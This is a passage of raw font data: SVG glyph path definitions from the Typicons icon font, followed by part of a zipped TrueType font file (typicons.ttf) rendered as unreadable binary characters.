t-56 137.5q-12 12 -12 29t12 29t29.5 12t29.5 -12zM779 538q116 -114 116 -279q0 -164 -116 -280q-12 -12 -29 -12t-29 12t-12 29.5t12 29.5q91 91 91 221q0 129 -91 220q-12 12 -12.5 29.5t11.5 29.5t29.5 12t29.5 -12zM422 557q31 0 54.5 -23.5t23.5 -66.5v-417
q0 -43 -23.5 -67t-54.5 -24q-28 0 -56 19l-111 74q-23 16 -62.5 28t-67.5 12q-52 0 -88.5 36.5t-36.5 88.5v83q0 52 36.5 88.5t88.5 36.5q29 0 68 11.5t62 27.5l111 74q28 19 56 19zM125 175q37 0 84.5 -14t82.5 -34v262q-35 -20 -82.5 -33.5t-84.5 -13.5q-17 0 -29.5 -12.5
t-12.5 -29.5v-83q0 -17 12.5 -29.5t29.5 -12.5zM417 50v417l-1 5q-14 -9 -41.5 -27.5t-41.5 -27.5v-317l79 -52l4 -3z" />
    <glyph glyph-name="glyph309" unicode="&#xe135;" horiz-adv-x="500" 
d="M422 557q31 0 54.5 -23.5t23.5 -66.5v-417q0 -43 -23.5 -67t-54.5 -24q-28 0 -56 19l-111 74q-23 16 -62.5 28t-67.5 12q-52 0 -88.5 36.5t-36.5 88.5v83q0 52 36.5 88.5t88.5 36.5q29 0 68 11.5t62 27.5l111 74q28 19 56 19zM292 127v262q-35 -20 -82.5 -33.5
t-84.5 -13.5q-17 0 -29.5 -12.5t-12.5 -29.5v-83q0 -17 12.5 -29.5t29.5 -12.5q37 0 84.5 -14t82.5 -34zM417 50v417l-1 5q-14 -9 -41.5 -27.5t-41.5 -27.5v-317l79 -52l4 -3z" />
    <glyph glyph-name="glyph310" unicode="&#xe136;" horiz-adv-x="819" 
d="M410 570q-39 0 -65 -44l-246 -410q-26 -44 -8.5 -76t69.5 -32h500q52 0 69 32t-9 76l-246 410q-26 44 -64 44zM410 654q85 0 135 -85l247 -411q50 -84 9 -159q-41 -74 -141 -74h-500q-99 0 -142 74q-42 74 9 159l247 411q50 85 136 85zM355 133q0 55 55 55q54 0 54 -55
q0 -54 -54 -54q-55 0 -55 54zM472 383q0 -11 -5 -23l-57 -143q-35 86 -58 143q-5 12 -5 23q0 26 18.5 44.5t44.5 18.5t44 -18.5t18 -44.5z" />
    <glyph glyph-name="glyph311" unicode="&#xe137;" horiz-adv-x="819" 
d="M792 158q51 -85 9 -159q-41 -74 -141 -74h-500q-101 0 -142 74q-42 74 9 159l247 411q50 85 136 85q85 0 135 -85zM410 69q27 0 45.5 18.5t18.5 45.5t-18.5 46t-45.5 19t-46 -19t-19 -46t19 -45.5t46 -18.5zM478 378q4 11 4 26q0 30 -21 51.5t-51 21.5t-51.5 -21.5
t-21.5 -51.5q0 -14 5 -27l58 -143q4 -7 10 -7t9 7q59 143 59 144z" />
    <glyph glyph-name="glyph312" unicode="&#xe138;" horiz-adv-x="583" 
d="M292 258q-17 0 -29.5 12.5t-12.5 29.5v83q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-41h42q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-83zM500 504q83 -85 83 -204t-83 -204v-88q0 -52 -36.5 -88.5t-88.5 -36.5h-167q-52 0 -88.5 36.5t-36.5 88.5v88
q-83 85 -83 204t83 204v88q0 52 36.5 88.5t88.5 36.5h167q52 0 88.5 -36.5t36.5 -88.5v-88zM167 592v-76q60 34 125 34t125 -34v76q0 17 -12.5 29t-29.5 12h-167q-17 0 -29 -12t-12 -29zM417 8v76q-60 -34 -125 -34t-125 34v-76q0 -17 12 -29t29 -12h167q17 0 29.5 12
t12.5 29zM292 92q86 0 147 61t61 147t-61 147t-147 61t-147.5 -61t-61.5 -147t61.5 -147t147.5 -61z" />
    <glyph glyph-name="glyph313" unicode="&#xe139;" 
d="M625 560q51 0 88 -37t37 -88q0 -48 -32 -83q32 -35 32 -84q0 -48 -32 -83q32 -35 32 -83q0 -52 -37 -89q-88 -88 -213 -88t-213 88q-15 15 -37 15t-37 -15q-36 -36 -88 -36q-51 0 -88 37t-37 88q0 48 32 83q-32 35 -32 83q0 49 32 84q-32 35 -32 83q0 51 37 88
q89 89 213 89t213 -89q15 -15 37 -15t37 15q37 37 88 37zM654 72q12 12 12 29.5t-12 29.5t-29 12t-29 -12q-39 -39 -96 -39t-96 39q-64 64 -154 64t-154 -64q-12 -12 -12 -29.5t12 -29.5t29 -12t29 12q40 40 96 40t96 -40q64 -64 154 -64t154 64zM96 464q-12 -12 -12 -29
t12 -29q13 -13 29 -13t29 13q39 39 96 39t96 -39q64 -64 154 -64t154 64q12 12 12 29t-12 29q-13 13 -29 13t-29 -13q-39 -39 -96 -39t-96 39q-64 64 -154 64t-154 -64zM654 239q12 12 12 29.5t-12 29.5t-29 12t-29 -12q-40 -40 -96 -40t-96 40q-64 64 -154 64t-154 -64
q-12 -12 -12 -29.5t12 -29.5t29 -12t29 12q39 39 96 39t96 -39q64 -64 154 -64t154 64z" />
    <glyph glyph-name="glyph314" unicode="&#xe13a;" horiz-adv-x="583" 
d="M417 8q-91 0 -155 64q-40 40 -95.5 40t-95.5 -40q-12 -12 -29.5 -12t-29.5 12t-12 29.5t12 29.5q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5q-64 -64 -154 -64zM417 175q-91 0 -155 64q-40 40 -95.5 40t-95.5 -40
q-12 -12 -29.5 -12t-29.5 12t-12 29.5t12 29.5q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40q12 12 29.5 12t29.5 -12t12 -29.5t-12 -29.5q-64 -64 -154 -64zM417 342q-91 0 -155 64q-40 40 -95.5 40t-95.5 -40q-12 -12 -29.5 -12t-29.5 12t-12 29t12 29
q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40q12 12 29.5 12t29.5 -12t12 -29t-12 -29q-64 -64 -154 -64z" />
    <glyph glyph-name="glyph315" unicode="&#xe13b;" horiz-adv-x="833" 
d="M625 8h-458q-69 0 -118 49t-49 118q0 58 35 102.5t90 58.5v6q0 104 73.5 177t176.5 73q80 0 144.5 -46.5t90.5 -121.5q92 7 157.5 -54.5t65.5 -152.5q0 -86 -61 -147.5t-147 -61.5zM163 259q-32 0 -56 -25t-24 -59t24.5 -58.5t59.5 -24.5h458q52 0 88.5 36.5t36.5 88.5
t-36.5 88.5t-88.5 36.5q-15 0 -34 -6l-45 -13l-7 46q-11 60 -57 99.5t-107 39.5q-69 0 -118 -48.5t-49 -117.5q0 -12 4 -34l10 -50z" />
    <glyph glyph-name="glyph316" unicode="&#xe13c;" horiz-adv-x="833" 
d="M542 -117q-17 0 -29.5 12.5t-12.5 29.5v250q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-250q0 -17 -12 -29.5t-29 -12.5zM292 -117q-17 0 -29.5 12.5t-12.5 29.5v250q0 17 12.5 29.5t29.5 12.5t29 -12.5t12 -29.5v-250q0 -17 -12 -29.5t-29 -12.5zM417 -200
q-17 0 -29.5 12.5t-12.5 29.5v250q0 17 12.5 29t29.5 12t29 -12t12 -29v-250q0 -17 -12 -29.5t-29 -12.5zM167 50q-69 0 -118 49t-49 118q0 58 35 102.5t90 58.5v5q0 103 73.5 176.5t176.5 73.5q81 0 145 -46t90 -121q91 7 157 -55t66 -153q0 -70 -42.5 -125.5t-109.5 -74.5
q-17 -5 -32.5 4t-19.5 25q-5 17 4 32t25 19q41 11 66.5 44.5t25.5 75.5q0 52 -36.5 88.5t-88.5 36.5q-18 0 -34 -5l-45 -13l-7 46q-11 60 -57 99.5t-107 39.5q-69 0 -118 -49t-49 -118q0 -11 4 -33l10 -50h-59q-32 0 -56 -24.5t-24 -58.5q0 -35 24.5 -59.5t59.5 -24.5
q17 0 29 -12t12 -29t-12 -29.5t-29 -12.5z" />
    <glyph glyph-name="glyph317" unicode="&#xe13d;" horiz-adv-x="473" 
d="M160 -33q-54 0 -105 18l-55 21l37 45q81 99 81 228t-81 228l-37 46l55 20q54 19 105 19q129 0 221 -92t92 -221t-92 -220.5t-221 -91.5zM139 51q7 -1 21 -1q94 0 161.5 67t67.5 162t-67.5 162t-161.5 67q-14 0 -21 -1q63 -106 63 -228t-63 -228z" />
    <glyph glyph-name="glyph318" unicode="&#xe13e;" horiz-adv-x="912" 
d="M562 675l-41 -125l-42 125q-6 17 2.5 33.5t25.5 22.5q23 8 43.5 -10t11.5 -46zM786 548l-118 -59l59 118q8 16 25.5 21.5t33.5 -2.5q25 -13 24 -39.5t-24 -38.5zM854 300l-125 42l125 41q17 6 33.5 -2t22.5 -25q8 -23 -10 -44t-46 -12zM315 607l59 -118l-118 59
q-17 8 -22.5 25t2.5 34q13 25 40 24t39 -24zM699 286q60 -23 97 -75.5t37 -118.5q0 -86 -61 -147.5t-147 -61.5h-458q-69 0 -118 49t-49 118q0 58 35 102.5t90 58.5v6q0 50 18 94q-24 22 -7 53t53 19q76 84 186 84l6 -1q55 63 140 63q77 0 132 -55t55 -132q0 -29 -9 -56z
M521 446q-44 0 -76 -34q88 -31 123 -121q21 6 47 8q10 22 10 43q0 43 -30.5 73.5t-73.5 30.5zM625 -33q52 0 88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5q-15 0 -34 -6l-12 -1q-33 0 -41 38q-11 58 -56 96t-104 40l-3 -1q-69 0 -118 -48.5t-49 -117.5q0 -12 4 -34l10 -50
l-59 1q-32 0 -56 -25t-24 -59t24.5 -58.5t59.5 -24.5h458z" />
    <glyph glyph-name="glyph319" unicode="&#xe13f;" horiz-adv-x="833" 
d="M625 50q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12q52 0 88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5q-18 0 -34 -5l-45 -13l-7 46q-11 60 -57 99.5t-107 39.5q-69 0 -118 -49t-49 -118q0 -11 4 -33l10 -50h-59q-32 0 -56 -24.5t-24 -58.5q0 -35 24.5 -59.5
t59.5 -24.5q17 0 29 -12t12 -29t-12 -29.5t-29 -12.5q-69 0 -118 49t-49 118q0 58 35 102.5t90 58.5v5q0 103 73.5 176.5t176.5 73.5q81 0 145 -46t90 -121q91 7 157 -55t66 -153q0 -86 -61 -147t-147 -61zM354 50l42 125l42 -125q6 -17 -2.5 -33.5t-25.5 -22.5
q-23 -8 -44 10t-12 46zM479 -33l42 125l41 -125q6 -17 -2 -33.5t-25 -22.5q-23 -8 -44 10t-12 46zM229 -33l42 125l41 -125q6 -17 -2 -33.5t-25 -22.5q-23 -8 -44 10t-12 46z" />
    <glyph glyph-name="glyph320" unicode="&#xe140;" horiz-adv-x="689" 
d="M654 169q18 -4 28 -18.5t6 -32.5q-5 -26 -32 -33.5t-44 12.5l-69 78l17 -61q4 -16 -4.5 -31t-25.5 -20l-11 -2q-14 0 -25 8.5t-15 22.5l-17 63q-26 -21 -51 -30l46 -46q12 -12 12 -29t-12 -29q-13 -13 -29 -13q-17 0 -30 13l-29 29h-10l27 -83q6 -17 -2.5 -33.5
t-25.5 -22.5q-23 -8 -43.5 10t-11.5 46l28 83h-11l-29 -29q-12 -12 -29.5 -12t-29.5 12t-12 29t12 29l46 46q-25 9 -51 30l-17 -63q-4 -14 -15 -22.5t-25 -8.5l-11 2q-16 4 -25 19t-4 32l16 62l-69 -79q-12 -13 -30.5 -14t-31.5 11q-14 12 -15 30t11 32q10 10 24 13l102 21
l-61 17q-17 5 -25.5 20t-4.5 31t19 25t32 4l63 -16q-3 15 -3 29t3 29l-63 -16l-11 -2q-14 0 -25 8.5t-15 22.5q-4 16 4.5 31t25.5 20l61 17l-102 21q-18 4 -28 18.5t-6 32.5q5 26 32 33.5t44 -12.5l69 -79l-16 62q-5 17 4 32t25 19q17 5 32 -4t19 -25l17 -63q26 21 51 30
l-46 46q-12 12 -12 29t12 29t29.5 12t29.5 -12l45 -45l-33 99q-6 17 2.5 33.5t25.5 22.5q23 8 43.5 -10t11.5 -46l-33 -99l45 45q12 12 29.5 12t29.5 -12t12 -29t-12 -29l-46 -46q25 -9 51 -30l17 63q4 16 19 25t32 4t25.5 -20t4.5 -31l-17 -61l69 78q12 13 30.5 14
t31.5 -11q14 -12 15 -30t-11 -32q-10 -10 -24 -13l-102 -21l62 -17q16 -4 25 -19t4 -32q-4 -14 -15 -22.5t-25 -8.5l-11 2l-63 16q3 -15 3 -29t-3 -29l63 16q17 5 32 -4t19 -25q5 -17 -4 -32t-25 -19l-62 -17zM345 196q43 0 73.5 30.5t30.5 73.5t-30.5 73.5t-73.5 30.5
t-74 -30.5t-31 -73.5t31 -73.5t74 -30.5z" />
    <glyph glyph-name="glyph321" unicode="&#xe141;" horiz-adv-x="833" 
d="M625 50q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12q52 0 88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5q-18 0 -34 -5l-45 -13l-7 46q-11 60 -57 99.5t-107 39.5q-69 0 -118 -49t-49 -118q0 -11 4 -33l11 -52l-60 2q-32 0 -56 -24.5t-24 -58.5q0 -35 24.5 -59.5
t59.5 -24.5q17 0 29 -12t12 -29t-12 -29.5t-29 -12.5q-69 0 -118 49t-49 118q0 58 35 102.5t90 58.5v5q0 103 73.5 176.5t176.5 73.5q81 0 145 -46t90 -121q91 7 157 -55t66 -153q0 -86 -61 -147t-147 -61zM443 217l-62 -146l125 -61l-188 -168l63 146l-125 60z" />
    <glyph glyph-name="glyph322" unicode="&#xe142;" horiz-adv-x="783" 
d="M433 633l-41 -122l-42 122q-6 17 2 33.5t25 22.5q24 8 45 -9.5t11 -46.5zM58 342l122 -42l-122 -42q-17 -6 -33.5 2.5t-22.5 25.5q-8 24 9.5 45t46.5 11zM350 -33l42 122l41 -122q6 -17 -2 -33.5t-25 -22.5q-24 -8 -45 9.5t-11 46.5zM725 258l-122 42l122 42
q17 6 33.5 -2.5t22.5 -25.5q8 -24 -9.5 -45t-46.5 -11zM185 565l57 -116l-116 57q-17 8 -22.5 25t2.5 34q13 25 40 24t39 -24zM126 94l116 57l-57 -116q-8 -17 -25 -22.5t-34 2.5q-25 13 -24 40t24 39zM598 35l-57 116l116 -57q17 -8 22.5 -25t-2.5 -34q-13 -25 -40 -24
t-39 24zM657 506l-116 -57l57 116q8 17 25 22.5t34 -2.5q25 -13 24 -40t-24 -39zM392 112q-77 0 -132.5 55.5t-55.5 132.5t55.5 132.5t132.5 55.5t132 -55.5t55 -132.5t-55 -132.5t-132 -55.5zM392 404q-43 0 -74 -30.5t-31 -73.5t31 -73.5t74 -30.5t73.5 30.5t30.5 73.5
t-30.5 73.5t-73.5 30.5z" />
    <glyph glyph-name="glyph323" unicode="&#xe143;" horiz-adv-x="833" 
d="M117 144q-9 0 -17 3q-46 20 -73 61.5t-27 91.5q0 58 35 102.5t90 58.5v6q0 103 73.5 176.5t176.5 73.5q92 0 161.5 -59t84.5 -150q3 -17 -7 -31t-27 -17q-17 -2 -31 7.5t-17 26.5q-11 60 -57 99.5t-107 39.5q-69 0 -118 -48.5t-49 -117.5q0 -12 4 -34l10 -53l-59 4
q-32 0 -56 -25t-24 -59q0 -25 13.5 -45.5t36.5 -30.5q20 -9 24 -28.5t-7.5 -35.5t-32.5 -16zM708 508q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-91q8 -21 8 -41q0 -52 -36.5 -88.5t-88.5 -36.5h-208q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5
t29 -12t12 -29t-12 -29.5t-29 -12.5q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h208q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12h-192q-17 0 -29 12.5t-12 29.5t12 29.5t29 12.5h400q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5t-29 12.5t-12 29.5t12 29t29 12z
" />
    <glyph glyph-name="glyph324" unicode="&#xe144;" horiz-adv-x="725" 
d="M600 592q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5h-91q8 -21 8 -42q0 -52 -36.5 -88.5t-88.5 -36.5h-267q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12t29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5
t88.5 36.5h267q17 0 29 12.5t12 29.5t-12 29.5t-29 12.5h-250q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h458q17 0 29.5 12.5t12.5 29.5t-12.5 29t-29.5 12t-29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5z" />
    <glyph glyph-name="glyph325" unicode="&#xe145;" horiz-adv-x="763" 
d="M763 352q0 -64 -44 -108l-232 -236q-24 -25 -47.5 -33t-57.5 -8q-65 0 -110 50l-240 241q-13 13 -22.5 39t-9.5 51q0 48 29 87q23 25 31 31q139 117 321.5 117t321.5 -117q13 -10 22 -20q38 -36 38 -94zM382 50q26 0 44 18t18 44t-18 44.5t-44 18.5t-44.5 -18.5
t-18.5 -44.5t18.5 -44t44.5 -18zM544 186q18 18 18 44.5t-18 44.5q-67 67 -162.5 67t-162.5 -67q-18 -18 -18 -44.5t18 -44.5t44.5 -18t44.5 18q31 31 73.5 31t73.5 -31q18 -18 44 -18q27 0 45 18zM661 304q18 18 18 44.5t-18 44.5q-115 115 -279 115t-280 -115
q-18 -18 -18 -44.5t18 -44.5t44 -18t44 18q80 80 192 80t191 -80q18 -18 44 -18t44 18z" />
    <glyph glyph-name="glyph326" unicode="&#xe146;" horiz-adv-x="874" 
d="M496 -9q-24 -25 -58.5 -24.5t-59.5 24.5t-25 58.5t25 59.5q24 25 58.5 25t59.5 -25q25 -24 25 -59t-25 -59zM790 320q-33 0 -58 25q-122 121 -295 121t-295 -121q-25 -25 -59 -24.5t-59 24.5q-25 25 -25 58.5t25 58.5q112 112 262 151.5t300.5 0t262.5 -151.5
q25 -25 25 -58.5t-25 -58.5t-59 -25zM260 143q-34 0 -59 25t-25 59t25 59q64 64 150 86.5t172 0t150 -86.5q25 -25 25 -59t-25 -59t-59 -25t-59 25q-49 49 -118 49t-118 -49q-25 -25 -59 -25z" />
    <glyph glyph-name="glyph327" unicode="&#xe147;" horiz-adv-x="464" 
d="M464 407q0 -85 -54.5 -149.5t-136.5 -78.5l1 -4v-167h41q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-166q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12h41v167l1 4q-82 14 -136.5 78.5t-54.5 149.5q0 47 10 106.5t18 92t11 39.5q4 13 15 21.5t25 8.5h306
q14 0 25 -8.5t15 -21.5q3 -7 11 -39.5t18 -92t10 -106.5zM232 258q55 0 96.5 35.5t49.5 89.5h-292q8 -54 49.5 -89.5t96.5 -35.5zM84 425h296q-4 79 -27 167h-242q-23 -88 -27 -167z" />
    <glyph glyph-name="glyph328" unicode="&#xe148;" 
d="M375 717q155 0 265 -110t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM375 467q0 -35 -4.5 -60.5t-10.5 -37.5t-12 -18.5t-10 -7.5l-5 -1v125q0 34 16.5 58.5t46.5 24.5q27 0 43 20.5t19 50.5q-39 12 -83 12q-84 0 -153 -42.5t-106 -114.5
q16 -15 46.5 -46t45.5 -47q0 5 1 12t11.5 18.5t29.5 11.5v-83l83 -84v-83q39 0 56 -0.5t36.5 -4.5t26 -13t6.5 -24q26 13 35.5 18t22.5 16.5t15.5 17.5t6.5 26t4 36v53l41 42l-41 41v-83h-42q0 -17 -12.5 -29.5t-29.5 -12.5t-29 12.5t-12 29.5t12 29.5t29 12.5v125
q0 17 -12 29t-29 12t-29.5 -12t-12.5 -29zM500 383q0 16 12 29t30 13q17 0 29 -12l42 -42q12 -12 12 -29.5t-12 -29.5l-30 -29q-1 -90 -17.5 -120.5t-88.5 -66.5q-8 -4 -18 -4q-17 0 -28.5 11t-13.5 27q-11 3 -84 3q-17 0 -29 12.5t-12 29.5v66l-193 193q-16 -46 -16 -92
q0 -121 85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5q0 87 -46.5 158t-122.5 106q-8 -44 -35 -70q37 -25 37 -69v-84z" />
    <glyph glyph-name="glyph329" unicode="&#xe149;" 
d="M375 717q155 0 265 -110t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM458 633v31q-42 11 -83 11q-75 0 -140.5 -31t-112.5 -86l-22 -28l-15 -24l123 -123q0 5 1 12t11.5 18.5t29.5 11.5v-83l83 -84v-83q39 0 56 -0.5t36.5 -4.5t26 -13t6.5 -24
q26 13 35.5 18t22.5 16.5t15.5 17.5t6.5 26t4 36v53l41 42l-41 41v-83h-42q0 -17 -12.5 -29.5t-29.5 -12.5t-29 12.5t-12 29.5t12 29.5t29 12.5v125q0 17 -12 29t-29 12t-29.5 -12t-12.5 -29q0 -35 -4.5 -60.5t-10.5 -37.5t-12 -18.5t-10 -7.5l-5 -1v125q0 34 16.5 58.5
t46.5 24.5t46 24.5t16 58.5z" />
    <glyph glyph-name="glyph330" unicode="&#xe14a;" horiz-adv-x="700" 
d="M396 342q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5h-84v-83q0 -8 -6 -14.5t-14 -6.5t-14.5 6.5t-6.5 14.5v83h-83q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h83v83q0 8 6.5 14.5t14.5 6.5t14 -6.5t6 -14.5v-83h84zM662 135q38 -38 38 -92t-38 -92.5t-92 -38.5
q-49 0 -88 33l-100 99q-48 -15 -90 -15q-121 0 -206.5 85.5t-85.5 206.5t85.5 206t206.5 85t206 -85t85 -206q0 -43 -15 -91zM499 181q-27 -41 -68 -68l105 -104q15 -13 34 -13q20 0 33.5 14t13.5 33q0 21 -14 33zM83 321q0 -86 61.5 -147.5t147.5 -61.5t147 61.5t61 147.5
t-61 147t-147 61t-147.5 -61t-61.5 -147z" />
    <glyph glyph-name="glyph331" unicode="&#xe14b;" horiz-adv-x="700" 
d="M396 342q9 0 15 -6t6 -15t-6 -15t-15 -6h-84v-83q0 -21 -20 -21q-9 0 -15 6t-6 15v83h-84q-20 0 -20 21t20 21h84v83q0 9 6 15t15 6q20 0 20 -21v-83h84zM600 199q10 -10 30.5 -31.5t31.5 -32.5q38 -38 38 -92t-38 -92.5t-92 -38.5q-55 0 -93 38l-94 94q-48 -15 -91 -15
q-121 0 -206.5 85.5t-85.5 206.5t85.5 206t206.5 85t206 -85t85 -206q0 -46 -14 -91zM83 321q0 -86 61.5 -147.5t147.5 -61.5t147 61.5t61 147.5t-61 147t-147 61t-147.5 -61t-61.5 -147z" />
    <glyph glyph-name="glyph332" unicode="&#xe14c;" horiz-adv-x="700" 
d="M396 300h-208q-8 0 -14.5 6.5t-6.5 14.5t6.5 14.5t14.5 6.5h208q8 0 14.5 -6.5t6.5 -14.5t-6.5 -14.5t-14.5 -6.5zM662 135q38 -38 38 -92t-38 -92.5t-92 -38.5q-49 0 -88 33l-100 99q-48 -15 -90 -15q-121 0 -206.5 85.5t-85.5 206.5t85.5 206t206.5 85t206 -85t85 -206
q0 -47 -15 -91zM499 181q-27 -41 -68 -68l105 -104q15 -13 34 -13q20 0 33.5 14t13.5 33q0 21 -14 33zM83 321q0 -86 61.5 -147.5t147.5 -61.5t147 61.5t61 147.5t-61 147t-147 61t-147.5 -61t-61.5 -147z" />
    <glyph glyph-name="glyph333" unicode="&#xe14d;" horiz-adv-x="700" 
d="M396 342q9 0 15 -6t6 -15t-6 -15t-15 -6h-208q-9 0 -15 6t-6 15t6 15t15 6h208zM662 135q38 -38 38 -92t-38 -92.5t-92 -38.5q-57 0 -93 38l-94 94q-48 -15 -91 -15q-121 0 -206.5 85.5t-85.5 206.5t85.5 206t206.5 85t206 -85t85 -206q0 -46 -14 -91q9 -9 26.5 -27
t26.5 -27zM83 321q0 -86 61.5 -147.5t147.5 -61.5t147 61.5t61 147.5t-61 147t-147 61t-147.5 -61t-61.5 -147z" />
    <glyph glyph-name="glyph334" unicode="&#xe14e;" horiz-adv-x="700" 
d="M409 467q-52 0 -88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5t88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5zM409 508q69 0 117.5 -48.5t48.5 -117.5t-48.5 -118t-117.5 -49t-118 49t-49 118t49 117.5t118 48.5zM0 64q0 54 38 92l94 95q-15 43 -15 91q0 121 85.5 206
t206.5 85t206 -85t85 -206t-85 -206.5t-206 -85.5q-43 0 -91 15l-100 -99q-39 -33 -88 -33q-54 0 -92 38.5t-38 92.5zM269 134q-41 27 -68 68l-104 -105q-14 -12 -14 -33q0 -20 14 -34t33 -14q18 0 34 14zM409 133q86 0 147 61.5t61 147.5t-61 147t-147 61t-147.5 -61
t-61.5 -147t61.5 -147.5t147.5 -61.5z" />
    <glyph glyph-name="glyph335" unicode="&#xe14f;" horiz-adv-x="700" 
d="M409 633q121 0 206 -85t85 -206t-85 -206.5t-206 -85.5q-43 0 -91 15l-97 -97q-40 -35 -91 -35q-54 0 -92 38.5t-38 92.5t37 91q42 43 63 64l32 32q-15 48 -15 91q0 121 85.5 206t206.5 85zM409 133q86 0 147 61.5t61 147.5t-61 147t-147 61t-147.5 -61t-61.5 -147
t61.5 -147.5t147.5 -61.5zM409 508q69 0 117.5 -48.5t48.5 -117.5t-48.5 -118t-117.5 -49t-118 49t-49 118t49 117.5t118 48.5zM409 217q52 0 88.5 36.5t36.5 88.5t-36.5 88.5t-88.5 36.5t-88.5 -36.5t-36.5 -88.5t36.5 -88.5t88.5 -36.5z" />
  </font>
</defs></svg>
PK!�A�P�P�&it_sanctum/fonts/typicons/typicons.ttfnu&1i��pFFTMl3��OS/26mQ�`cmapNNY%x�cvt s�N|Hfpgm�
x;|d	�gasp|@glyf�0\]�head�9Oc(6hheadBc`$hmtx��c�:loca\ah��maxpK
�kd name��'k��post-�An&prep������V�=��������������1PfEd���O �8Z � ���O�����	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLNOPQRSTUMVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOP!*�)@&YMQE+3!'3#!	�����f!X���y+@([[OSG+  &264&"2#������Γ�Γ�V{{Vy�����|�В��8z�z�M��(Z`gk�@MB
'	a_V9BK�	PX@A
`[[
	
[
		YOSG@Bh[[
	
[
		YOSGY@1hh[[hkhkjigf[`[`USPNHGA?<:43/.*)!
+4246;&546232#".547&"2654&"3264&+5>54&"#";.5475>547#&42MT��J3z�z$92jQXdO�`>2d"��"aE��$/IhI0#��Ea
T�$0p}T�TT�3J&-VzzV-&$"%?k�02>`�O?%Nx��xLr4"2
>*4II4)?
2"��rL-%_1��K0%�TT	��
�'/7?G:@7<7,'	BjkOSGEDA@54%$+'&676&'&6&7/76%.76&6?%&/7>2"&4�**
��{{!#k)*
�#zz!�w
69tt9"
69tt9"���nn�o�z!#��***��z!#[*
**�"t�N
69tW"t�
69tio�oo���G�19L@I$	-B		hhi	[OSG76#&#&
+$2"&5462#"&46;5.546232+>54"264
"��"_H��%.IhI/%��H_�""�y��yKs4"2
@(4II4(@
2"��sK{""��P'1R@O	[
Y[OSG)(
-,(1)0!'&

+2+"&4632#!"&4632#!"&5463265!3�		}		��<qI4��4I��6,$""}��4II4M�_#�����d'@@=$%&BkYOSG#"''"+%#"'.'&'&47>%./55�
0}TF��G�����g�j%��JA<"$"G敦Te�����;4@1B?hOSG
+2.'#"'	6$��@�j��;jՐ*aCh����*<@9B(!?[OSG%$**+&47>54626%"764&"4&"'&M��%%"e$IhI$f"%%���#�"�X)%f%" �4II4� "%f%�#��#���m�����H�@?ja%+	&4624632762����2DB1#"1B}2D��D2B."11"��B����@?ja+'&46246276���#`"`#��#_<��_���d(H@E! 'Bk[OSG#"((+"&=4675476'&=%77'"6*��G��FT}0
8*��j�g!*��G"��$��"<AJ�����eT�;+@(B?hOSG+462	"&=5467M"��"j�@������hCa*����%N+<@9B[[[OSG#$#%+%"'	6232+%264/!264&#!7654&"�Jf%��)#j#% �4II4� �x�#���m�#23J%()##%31#IhI#��"�"����'3@0BjkOTH
+2#!"'	62m"10#��BF��DBV1#"1BEEB\�3@0BjkOTH
+2#!#"/762���_��#_V"_#��#_���yB[v@sI#ZB[
[	[
\

[OSGURNKGE>;852/,*&%! BA	+2#!"&46;276264&+764&"264/32#!"&46;264&+"3%#"/+"3!2654&'q3JZv�y��y��y)1"y$^VznMW5"��"5W+=I4��4II4))V{{V�1"#�	*)#12"w"1
yJ3�gy���x$��{�z6#��#6IhIIhI"z�{�"1�1"#11#/2�O+��$BK�
PX@(^`\OSGK�PX@)^h\OSG@(jh\OSGYY@'&"!
++	+2#!"&4632#"3!264&+"/7622MozV��VzzV4II4N4I>+V5
 
��"5�{�zz�{"IhIIhI6"

��"6���#1G]t�@�BosrhgcVB		h

hfhfh

[		[
Y[\ZOTH_^IH$$qpkifd^t_tZYTRNLH]I]FE@>:853$1$0-+('#"
+!!#!467'!>54&"#"326=3264&#5#";32?26264&+764&#"54&"26;57#"&547#6�./%��
G)��/%"
@�"}�"�J�B��"�`B��"�"2

Q"1	V���(@
��%/$(@
'%.����"���"}�"�#�B�q"�#�B�M1"V	2"V	���y+9G�@�
	+
B

h
f
f
f
f

f	[	
	
[

\OTHEC@>;:7520-,('$!
+3"&=#"&4?#"&466232+54626"&=32+2#"&46;54��"��B�"�B�*";"�}f"�}y�B�#�"�}#�"�B��"}�"}���,:Qgow��@�*	&
Ci 	
qb
